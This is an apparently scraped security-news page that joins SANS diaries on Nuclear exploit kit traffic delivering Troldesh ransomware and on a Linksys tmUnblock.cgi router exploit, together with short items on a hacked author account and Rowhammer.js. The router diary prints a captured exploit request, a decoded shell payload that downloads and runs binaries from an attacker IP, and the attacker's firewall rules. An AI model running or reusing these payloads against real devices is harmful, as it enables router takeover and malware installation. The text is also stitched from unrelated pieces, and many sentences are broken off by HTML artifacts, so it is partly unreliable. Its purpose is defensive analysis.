Hackin9
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Introduction

About two weeks ago, Nuclear exploit kit (EK)changed its URL patterns. Now it looks a bit likeAngler EK. Kafeine originally announced the change on 2015-07-21 [1], and we collected examples the next day.

Heres how Nuclear EK looked on" />

Here" />

Now that were into August 2015,URL patterns for Nuclear EK have altered again. These changes are similar to weve seen withAngler EK since June 2015 [3]. Theyre not the same URL patternsas Angler, but the changes are similar.

In todays diary, weexamine Nuclear EKtraffic as of Tuesday, 2015-08-04. In this example, the EK delivered Troldesh ransomware, which is similar to a previous infection I publishedearlier this year in April 2015[4].

First, lets see how the 2015-08-04 traffic from a compromised website led to Nuclear EK.

From a compromised web site to the EK

I viewed the compromised website by getting to it through a Bing search, which is my preferred method for generating EK traffic. Google had already identified the site as potentially malicious and wouldn" />

Malicious javascript was injected in at least 4 places when I visited the sites index page. The script is obfuscated, so you wont see any obvious URLs. I" />

Whats the easiestway to deobfuscate the script? Copy and paste the script into its own HTML file, make sure you" />

Open the resulting web page in a browser, and you should see an alert showing the deobfuscated script. From the aboveexample, we finda hidden iframe that goes to mobi-avto.ru." />

With any EK, this all happens behind the scenes. The average user wont know what happened until its too late. With ransomware, users will realize something" />
Shown above: The infected hosts desktop after the Troldesh ransomware infection.

A look at theNuclear EK traffic

On 2015-07-21 when Nuclear changed, each GET request from the EK started with search?q=. URL patterns remained that way through at least 2015-07-30 [5]. A few days later, the landing page URL still containssearch?q=. However, other URLs for the Flash exploit and payload use different words.They also follow a differentpattern after the question mark (?) up to the equal sign (=). Below shows our example of" />

In the 2015-08-04 traffic,Nuclear EKs landing page has some text before the initialHTML tag. This is something wehadn" />

Except for the change in the URL pattern, this HTTP GETrequest for the EKs Flash exploit is similar to what we" />

Nuclear EK still uses an ASCII string to XOR the payload binary. This started with Nuclears previous change of URL patterns back in December 2014 [6], and it remains the EK" />

Review the infection traffic using Security Onion with the EmergingThreats signature set, and youll find" />

Additional information from the infected host

Filtering the traffic in Wireshark, we see SSL activity to 216.230.230.247 over port 443 and 193.111.140.118 over port 995. Although this traffic is related to the Troldesh ransomware,those IP addressesarenot inherently malicious. " />

The README text files fromthe desktop were identical. " />

Hey,Google. Someone is using Gmail accounts for nefarious purposes. Bet you havent seen that before! Ah, free services... A cyber-criminals delight!

Final words

In recent months, weve seen a lot of ransomware from EK traffic. This has been primarily (but not limited to)Angler, Magnitude, and NuclearEK. Most of the ransomware has been CryptoWall 3.0 [7], but every once in a while, well see something like AlpaCrypt/TeslaCrypt[8]or Toldesh [4]. Well continue to monitor EK traffic andpost any significant changes.

A pcap of the 2015-08-04 Nuclear EK infection traffic is available at:

A zip file of the associated malware is available at:

The zip file is password-protected with the standard password. If you dont know it, email [email protected] and ask.

---
Brad Duncan
ISC Handler and Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] http://www.malware-traffic-analysis.net/2015/07/22/index.html
[2] http://www.malware-traffic-analysis.net/2015/07/20/index.html
[3] https://threatpost.com/evasion-techniques-keep-angler-eks-cryptowall-business-thriving/113596
[4] http://www.malware-traffic-analysis.net/2015/04/09/index.html
[5] http://www.malware-traffic-analysis.net/2015/07/30/index.html
[6] https://isc.sans.edu/diary/Exploit+Kit+Evolution+During+2014+-+Nuclear+Pack/19081
[7]https://isc.sans.edu/diary/Another+example+of+Angler+exploit+kit+pushing+CryptoWall+30/19863
[8]https://isc.sans.edu/diary/Angler+exploit+kit+pushes+new+variant+of+ransomware/19681

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Andy Weir is the creator of Mark Watney, a fictional astronaut who can solve any problem the harsh environment of Mars throws his way.

But Weir, author of The Martian, ran into a tricky problem on Earth this week when his e-mail and Twitter accounts were hacked. The culprit, he says, was a hacker who reset the password for his Comcast.net e-mail account by calling Comcast and pretending to be him. Comcast let the hacker take control of his e-mail account after asking "security questions" for which the answers were easy to find, according to Weir.

"Well I got hacked," Weir wrote on Facebook last night. "Someone compromised my e-mail account and twitter account. I don't know how they got the password. My guess is they socially engineered a password reset on my e-mail account, and they used that to do a password reset on Twitter. They also set up an e-mail forward to an account they control, so even after I changed my e-mail password they were still getting my e-mails until I found that. Whee."

Read 10 remaining paragraphs | Comments

 
[SECURITY] [DSA 3328-2] wordpress regression update
 

In March, researchers revealed one of the more impressive if slightly esoteric hacks in recent memory—an attack that exploited physical weaknesses in computer memory chips to hijack the operating system running on them. Now a separate research team has unveiled techniques that make the attack more practical by allowing hacked or malicious websites to carry it out against unsuspecting visitors.

The "bitflipping" attack exploits physical flaws in certain DDR3 chip modules. By repeatedly accessing specific memory locations millions of times per second, attackers can cause zeroes to change to ones and vice versa in nearby memory locations. These bitflips can make it possible for an untrusted application to gain nearly unfettered system privileges or to bypass security sandboxes designed to keep malicious code from accessing sensitive operating system resources. Early versions of the attack worked only by running special code that wasn't practical in website environments, making the weakness hard to exploit in large, drive-by-style campaigns.

Last week, researchers published a bitflipping method that relies on JavaScript code used by standard browsers. Rowhammer.js, as the new proof-of-concept attack has been dubbed, is slow, and so far it only works on a Lenovo x230 Ivy Bridge Laptop running default settings and on a Haswell CPU if its refresh interval is increased as gamers sometimes do to increase system performance. And even then, the researchers were unable to use the attack to gain root access. Despite the limitations, however, the modified attack does what has never been done before—achieving a bitflipping attack using nothing more than the JavaScript allowed by every modern browser.

Read 5 remaining paragraphs | Comments

 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: Security fix BZ1205130 - patch for CTCP Denial of ServiceNew upstream release of Quassel IRC Client
 
LinuxSecurity.com: Security Report Summary
 
Mozilla extensions: a security nightmare
 
[SECURITY] [DSA 3328-1] wordpress security update
 
[SECURITY] [DSA 3327-1] squid3 security update
 

Last year, we wrote about the Moon Worm, a bitcoin mining piece of malware that infected Linksys routers. Ever since then, I have seen lots and lots of hits to the vulnerable cgi script (tmUnblock.cgi">27.100.64.102 - - [04/Aug/2015:10:03:44 +0000] GET /tmUnblock.cgi HTTP/1.1 200 195 - -
27.100.64.102 - - [04/Aug/2015:10:03:45 +0000] POST /tmUnblock.cgi HTTP/1.1 200 195 - -">POST /tmUnblock.cgi HTTP/1.1
Host: [server ip address]:8080
Accept-Encoding: identity
Content-Length: 850

%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e %3d%61%63%74%69%6f%6e%3d%63%6f%6d%6d%69%74%3d%74%74%63%70%5f%6e%75%6d%3d%32%74 %74%63%70%5f%73%69%7a%65%3d%32%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74 %6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%69%72%6b%31%2e %73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%69%72%6b%32%2e%73%68%20%68%74 %74%70%3a%2f%2f%31%30%39%2e%32%30%36%2e%31%37%37%2e%31%36%2f%66%65%72%72%79%2f%72 %65%76%31%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73%68%3b%65%63%68%6f%20%22%63 %68%6d%6f%64%20%2b%78%20%69%72%6b%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73%68 %3b%65%63%68%6f%20%22%2e%2f%69%72%6b%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73 %68%3b%63%68%6d%6f%64%20%2b%78%20%69%72%6b%31%2e%73%68%3b%2e%2f%69%72%6b%31%2e%73 %68%60">submit_button=change_action=action=commit=ttcp_num=2ttcp_size=2echo #!/bin/sh echo wget -O irk2.sh hxxp://109.206.177.16/ferry/rev12.sh echo chmod +x irk2.sh echo ./irk2.sh ./irk1.sh`StartEPI=1

Unlike for the Moon worm, the additional malware is not pulled from the host sending the exploit. The irk2.sh / rev12.sh">#!/bin/sh
cd /tmp
wget -O .nttpd hxxp://109.206.177.16/ferry/.nttpd,14-le-t1
chmod +x .nttpd
./.nttpd
sleep 2
wget -O .sox http://109.206.177.16/ferry/.sox,14-le-t1
chmod +x .sox
./.sox

The script downloads and runs two additional executables. I havent done the full analysis yet (let me know if you want a copy and can">INPUT -p udp --dport 9999 -j DROP
INPUT -p tcp -m multiport --dport 80,8080 -j DROP
INPUT -s 109.206.177.16 -j ACCEPT
INPUT -s 50.77.24.41 -j ACCEPT
INPUT -s 109.206.186.250 -j ACCEPT
INPUT -s 91.217.90.49 -j ACCEPT
INPUT -s 91.217.90.19 -j ACCEPT

So looks like the attacker is securing the router by blocking access to the web based admin (port 80, 8080) and allowing access from very specific IP addresses, probably controlled by the attacker.

Virustotal identifies .nttpd and .soxas a proxy(Avast, DrWeb) . Reports for these binaries go back a few months.

The scripts also appear to modify name servers in resolv.conf, but so far I think they only set them to Googles name servers (8.8.8.8 and 8.8.4.4).

FWIW: per whois,109.206.177.16, belongs to Serverel, a California company (but it is RIPE IP address space).[email protected] was notified.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Internet Storm Center Infocon Status